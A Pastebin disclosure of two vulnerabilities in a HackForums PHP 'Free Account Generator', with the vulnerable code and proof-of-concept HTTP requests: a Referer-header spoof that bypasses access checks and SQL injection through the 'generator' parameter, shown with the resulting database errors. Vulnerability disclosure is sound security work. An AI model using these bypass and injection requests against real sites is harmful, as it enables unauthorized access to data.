Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ==============================================================================================
- [-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities
- [-] Author => DigiGang (digitalgangster@lelantos.org)
- [-] Date Release => 22 August, 2016
- [-] Vendor => HackForums, froy0z
- Title => Free Account Generator 2.0
- Thread Post => http://hackforums.net/showthread.php?tid=4882268
- Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA
- Vulnerable Version => 2.0
- Tested Version => Latest, 2.0 on a Wamp Server
- ==============================================================================================
- Vulnerability #1 : Using the generator without even registration or purchasing a membership.
- Vuln File: /lib/generate.php
- Vuln Code: Line 3-6
- /*********************************************************************************
- 3. $pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST'));
- 4. if($pos===false){
- 5. die('No Access');
- 6. }
- *********************************************************************************/
- strpos checks if the HTTP_REFERER matches with HTTP_HOST before generating data
- which make it possible for anyone to use the generator by simply changing the referer.
- [-] Proof Of Concept [-]
- http://localhost/lib/generate.php?generator=1
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- If-None-Match: 1
- Upgrade-Insecure-Requests: 1
- Response:
- No Access
- [bypass]
- http://localhost/lib/generate.php?generator=1
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://localhost/lib/generate.php?generator=1
- Connection: keep-alive
- If-None-Match: 1
- Upgrade-Insecure-Requests: 1
- Response:
- test@account.com:123123
- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Vulnerability #2 : SQL Injection
- Vuln File: /lib/generate.php
- Vuln Code: Line 10 & 34-40
- /******************************************************************************************************************************************************************
- 10. $generator = mysqli_real_escape_string($con, $_GET['generator']);
- 34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con));
- 35. if(mysqli_num_rows($result) < 1){
- 36. exit("0 Accounts in stock");
- 37. }
- 38. while($row = mysqli_fetch_array($result)){
- 39. echo $row['alt'];
- 40. }
- ******************************************************************************************************************************************************************/
- The mysqli_query use the parameter 'generator' in the SQL query, which makes it possible to interfer and send malicious commands to the DBMS.
- [-] Proof Of Concept [-]
- http://localhost/lib/generate.php?generator=1+3
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://localhost/lib/generate.php?generator=1+3
- Connection: keep-alive
- Upgrade-Insecure-Requests: 1
- If-None-Match: 1
- Response:
- Table 'FAG_2sql1.generator1 3' doesn't exist
- http://localhost/lib/generate.php?generator=1`+TEST
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://localhost/lib/generate.php?generator=1`+TEST
- Connection: keep-alive
- Upgrade-Insecure-Requests: 1
- If-None-Match: 1
- Response:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1
Add Comment
Please, Sign In to add comment